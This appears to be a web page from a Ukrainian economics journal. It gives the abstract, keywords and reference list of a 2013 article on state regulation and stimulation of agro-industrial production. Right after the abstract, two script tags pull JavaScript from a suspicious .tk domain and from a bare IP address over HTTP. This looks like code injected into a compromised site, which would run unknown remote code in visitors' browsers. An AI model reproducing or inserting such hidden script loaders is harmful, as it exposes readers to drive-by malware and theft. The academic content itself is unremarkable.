ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.342:631.16
Економіка агропромислового виробництва

Удосконалення механізму державного регулювання та стимулювання розвитку агропромис­лового виробництва / // Економіка АПК. - 2013. - № 2 - С. 21

Розкрито концептуальні наукові основи розробки практичних заходів удосконалення механізму державного регулювання розвитку та стимулювання агропромислового виробництва, проаналізовано особливості функціонування механізму регулювання агропромислового виробництва в сучасних ін- ституціональних умовах і за умови трансформаційних змін у розвитку аграрного сектору економіки. Запропоновано напрями удосконалення механізму державного регулювання з урахуванням особливо­стей українського аграрного сьогодення. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: механізм, державне регулювання, стимулювання, агропромислове виробництво, реформування, управління

Список використаних джерел

 1. Амбросов В.Я. Забезпечення державної підтримки сільськогосподарського виробництва в умовах членства України у СОТ / В.Я. Амбросов, В.М. Онєгіна // Економіка АПК. - 2009. - №2. - С. 16-18.
 2. Бородіна ОМ. Державна підтримка сільського господарства: концепція,механізми, ефективність / О.М. Бородіна // http:// www. ief.org. ua/ Arjiv _EP/Borodina106.pdf.
 3. БотвінаH.O. Фінансова політика сталого розвитку агросфери: моногр. / Н.О. Ботвіна. - К.: ННЦ ІАЕ, 2011. - 304 с.
 4. Гудзь О.Є. Механізми прямої фінансової підтримки сільськогосподарського виробництва. Державна політика фінансової підтримки розвитку аграрного сектору АПК: моногр. / [Дем’яненко М.Я., Саблук П.Т., Скупий В.М. та ін.]; за ред. М.Я Дем’яненка. - К.: ННЦ ІАЕ, 2011. - 372 с.
 5. Карпенко Г.Г. Государственное регулирование аграрного сектора экономики: теория методология практика / Г.Г. Карпенко. - Ставрополь: Изд-во СевКавГТУ, 2010. - 365 с.
 6. Ковалюк О.М. Фінансовий механізм організації економіки України (проблеми теорії і практики): моногр. / О.М.Ковалюк. - Львів: Видавничий центр Львівського національного університету імені Івана Франка, 2002. - 396 с.
 7. Непочатенко О.О. Теоретичні і практичні аспекти державної підтримки аграрного сектора економіки / О.О.Непочатенко, А.Ф. Головчук, Фінансово-економічні проблеми стабільного розвитку економіки України / під ред. А.Ф. Головчука, О.О. Непочатенко (Ч. 1). - Умань: ВПЦ «Візаві», 2010. - С.175-183.
 8. Саблук П.Т. Глобалізація і продовольство: моногр. / П.Т. Саблук, О.Г Білоус, В. І. Власов. - К.: - ННЦ ІАЕ, 2008. - 632 с.
 9. Стецюк П.А. Еволюція форм і методів державної підтримки вітчизняних сільськогосподарських товаровиробників / П.А. Стецюк // Фінанси в процесі реформування агропромислового виробництва; за ред. М. Я. Дем’яненка. - К.: ІАЕ УААН, 2002. - С. 48-68.
 10. Smith M.K. Social Capital - The encyclopaedia of informal education / Smith M.K. // www.infed.org/biblio/social_capital.htm.
 11. Commons J.R. Inctitutional Economics / J.R. Commons // The American Economic Review. Vol. 21. - № 4. - (Dec. 1931). - P. 648-657.
 12. Hamilton, Walton H. The Inctitutional Approach to Economic Teory / Hamilton, Walton H. // American Economic Review. - 1919. - № 9. -P. 309-318.
Читати статтю: 13_02_04.pdf